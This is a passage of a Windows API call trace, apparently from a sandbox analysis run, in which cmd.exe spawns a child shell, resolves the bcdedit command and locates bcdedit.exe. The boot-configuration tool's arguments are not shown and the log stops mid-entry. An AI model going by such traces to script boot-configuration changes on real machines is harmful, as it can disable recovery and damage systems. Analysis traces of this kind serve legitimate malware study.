[0202.860] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0202.861] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0202.862] GetProcessHeap () returned 0x170000 [0202.862] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x18fe90 | out: hHeap=0x170000) returned 1 [0202.862] GetProcessHeap () returned 0x170000 [0202.862] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x12) returned 0x188a20 [0202.862] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0202.864] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 2495304\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x16f3d0*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 2495304\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16f380 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 2495304\"", lpProcessInformation=0x16f380*(hProcess=0x60, hThread=0x58, dwProcessId=0x4d4, dwThreadId=0x7f8)) returned 1 [0202.872] CloseHandle (hObject=0x58) returned 1 [0202.872] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0202.872] GetProcessHeap () returned 0x170000 [0202.872] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x188b80 | out: hHeap=0x170000) returned 1 [0202.872] GetEnvironmentStringsW () returned 0x188b80* [0202.872] GetProcessHeap () returned 0x170000 [0202.872] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0xac4) returned 0x193160 [0202.872] FreeEnvironmentStringsW (penv=0x188b80) returned 1 [0202.872] GetProcessHeap () returned 0x170000 [0202.872] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x188a20 | out: hHeap=0x170000) returned 1 [0202.872] DeleteProcThreadAttributeList (in: lpAttributeList=0x16f398 | out: lpAttributeList=0x16f398) [0202.872] _get_osfhandle (_FileHandle=3) returned 0x54 [0202.872] DuplicateHandle (in: hSourceProcessHandle=0x60, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0202.872] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0202.873] _close (_FileHandle=5) returned 0 [0202.873] _dup (_FileHandle=0) returned 4 [0202.874] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0202.874] _close (_FileHandle=3) returned 0 [0202.875] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0202.875] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0202.875] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0202.875] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0202.875] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0202.875] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0202.875] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0202.875] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0202.875] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0202.875] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0202.875] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0202.875] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0202.875] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0202.875] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0202.875] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0202.875] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0202.875] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0202.875] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0202.876] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0202.876] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0202.876] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0202.876] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0202.878] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0202.878] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0202.878] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0202.878] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0202.878] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0202.878] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0202.878] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0202.878] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0202.878] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0202.878] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0202.878] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0202.878] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0202.878] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0202.878] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0202.878] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0202.879] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0202.879] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0202.879] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0202.879] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0202.879] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0202.879] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0202.879] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0202.879] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0202.879] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0202.879] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0202.879] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0202.879] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0202.879] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0202.879] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0202.879] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0202.879] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0202.879] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0202.879] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0202.879] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0202.879] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0202.879] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0202.879] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0202.879] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0202.880] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0202.880] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0202.880] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0202.880] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0202.880] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0202.880] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0202.880] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0202.880] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0202.880] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0202.880] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0202.880] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0202.880] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0202.880] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0202.880] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0202.880] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0202.880] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0202.880] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0202.880] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0202.880] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0202.880] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0202.880] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0202.880] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0202.880] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0202.880] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0202.880] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0202.881] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0202.881] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0202.881] GetProcessHeap () returned 0x170000 [0202.881] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x4010) returned 0x193c30 [0202.881] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0202.881] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0202.882] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0202.882] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0202.882] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0202.882] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0202.882] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0202.882] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0202.882] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0202.882] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0202.882] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0202.882] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0202.882] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0202.882] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0202.882] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0202.882] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0202.882] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0202.882] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0202.882] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0202.882] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0202.882] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0202.882] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0202.882] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0202.882] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0202.882] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0202.882] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0202.882] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0202.882] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0202.883] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0202.883] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0202.883] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0202.883] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0202.883] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0202.883] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0202.883] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0202.883] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0202.883] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0202.883] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0202.883] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0202.883] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0202.883] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0202.883] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0202.883] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0202.883] GetProcessHeap () returned 0x170000 [0202.883] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x420) returned 0x190a20 [0202.884] SetErrorMode (uMode=0x0) returned 0x1 [0202.884] SetErrorMode (uMode=0x1) returned 0x0 [0202.884] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x190a30, lpFilePart=0x16f590 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x16f590*="system32") returned 0x13 [0202.884] SetErrorMode (uMode=0x1) returned 0x1 [0202.884] GetProcessHeap () returned 0x170000 [0202.884] RtlReAllocateHeap (Heap=0x170000, Flags=0x0, Ptr=0x190a20, Size=0x48) returned 0x190a20 [0202.884] GetProcessHeap () returned 0x170000 [0202.884] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x190a20) returned 0x48 [0202.884] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.884] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0202.884] GetProcessHeap () returned 0x170000 [0202.884] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x104) returned 0x185c90 [0202.884] GetProcessHeap () returned 0x170000 [0202.884] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x1f8) returned 0x190a80 [0202.891] GetProcessHeap () returned 0x170000 [0202.891] RtlReAllocateHeap (Heap=0x170000, Flags=0x0, Ptr=0x190a80, Size=0x106) returned 0x190a80 [0202.891] GetProcessHeap () returned 0x170000 [0202.891] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x190a80) returned 0x106 [0202.891] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.891] GetProcessHeap () returned 0x170000 [0202.891] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0xe8) returned 0x190ba0 [0202.891] GetProcessHeap () returned 0x170000 [0202.891] RtlReAllocateHeap (Heap=0x170000, Flags=0x0, Ptr=0x190ba0, Size=0x7e) returned 0x190ba0 [0202.891] GetProcessHeap () returned 0x170000 [0202.891] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x190ba0) returned 0x7e [0202.891] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.891] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x16f300, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f300) returned 0x185da0 [0202.892] GetProcessHeap () returned 0x170000 [0202.892] RtlReAllocateHeap (Heap=0x170000, Flags=0x0, Ptr=0x184770, Size=0x8) returned 0x188a20 [0202.892] FindClose (in: hFindFile=0x185da0 | out: hFindFile=0x185da0) returned 1 [0202.892] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x16f300, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f300) returned 0xffffffffffffffff [0202.892] GetLastError () returned 0x2 [0202.892] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x16f300, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f300) returned 0x185da0 [0202.892] FindClose (in: hFindFile=0x185da0 | out: hFindFile=0x185da0) returned 1 [0202.893] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0202.893] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0202.893] GetProcessHeap () returned 0x170000 [0202.893] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x28) returned 0x184770 [0202.893] GetProcessHeap () returned 0x170000 [0202.893] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x218) returned 0x190c30 [0202.893] GetProcessHeap () returned 0x170000 [0202.893] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x86) returned 0x190660 [0202.893] GetProcessHeap () returned 0x170000 [0202.893] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x420) returned 0x188b80 [0202.893] SetErrorMode (uMode=0x0) returned 0x1 [0202.893] SetErrorMode (uMode=0x1) returned 0x0 [0202.893] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x188b90, lpFilePart=0x16f320 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x16f320*="system32") returned 0x13 [0202.893] SetErrorMode (uMode=0x1) returned 0x1 [0202.893] GetProcessHeap () returned 0x170000 [0202.893] RtlReAllocateHeap (Heap=0x170000, Flags=0x0, Ptr=0x188b80, Size=0x48) returned 0x188b80 [0202.893] GetProcessHeap () returned 0x170000 [0202.893] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x188b80) returned 0x48 [0202.894] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.894] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0202.894] GetProcessHeap () returned 0x170000 [0202.894] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x104) returned 0x190e50 [0202.894] GetProcessHeap () returned 0x170000 [0202.894] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x1f8) returned 0x190f60 [0202.894] GetProcessHeap () returned 0x170000 [0202.894] RtlReAllocateHeap (Heap=0x170000, Flags=0x0, Ptr=0x190f60, Size=0x106) returned 0x190f60 [0202.894] GetProcessHeap () returned 0x170000 [0202.894] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x190f60) returned 0x106 [0202.894] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.894] GetProcessHeap () returned 0x170000 [0202.894] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0xe8) returned 0x188be0 [0202.894] GetProcessHeap () returned 0x170000 [0202.894] RtlReAllocateHeap (Heap=0x170000, Flags=0x0, Ptr=0x188be0, Size=0x7e) returned 0x188be0 [0202.894] GetProcessHeap () returned 0x170000 [0202.894] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x188be0) returned 0x7e [0202.894] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.895] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x16f090, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f090) returned 0x185da0 [0202.895] FindClose (in: hFindFile=0x185da0 | out: hFindFile=0x185da0) returned 1 [0202.895] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x16f090, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f090) returned 0xffffffffffffffff [0202.895] GetLastError () returned 0x2 [0202.896] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x16f090, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f090) returned 0x185da0 [0202.896] FindClose (in: hFindFile=0x185da0 | out: hFindFile=0x185da0) returned 1 [0202.896] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0202.896] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0202.896] GetConsoleTitleW (in: lpConsoleTitle=0x16f5e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.896] InitializeProcThreadAttributeList (in: lpAttributeList=0x16f398, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16f358 | out: lpAttributeList=0x16f398, lpSize=0x16f358) returned 1 [0202.896] UpdateProcThreadAttribute (in: lpAttributeList=0x16f398, dwFlags=0x0, Attribute=0x60001, lpValue=0x16f348, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16f398, lpPreviousValue=0x0) returned 1 [0202.896] GetStartupInfoW (in: lpStartupInfo=0x16f4b0 | out: lpStartupInfo=0x16f4b0*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0202.896] GetProcessHeap () returned 0x170000 [0202.896] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x20) returned 0x18fec0 [0202.896] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.896] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.897] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.898] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.898] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.898] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.898] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.898] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.898] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.898] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.898] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0202.898] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0202.898] GetProcessHeap () returned 0x170000 [0202.898] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x18fec0 | out: hHeap=0x170000) returned 1 [0202.898] GetProcessHeap () returned 0x170000 [0202.898] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x12) returned 0x1906f0 [0202.898] lstrcmpW 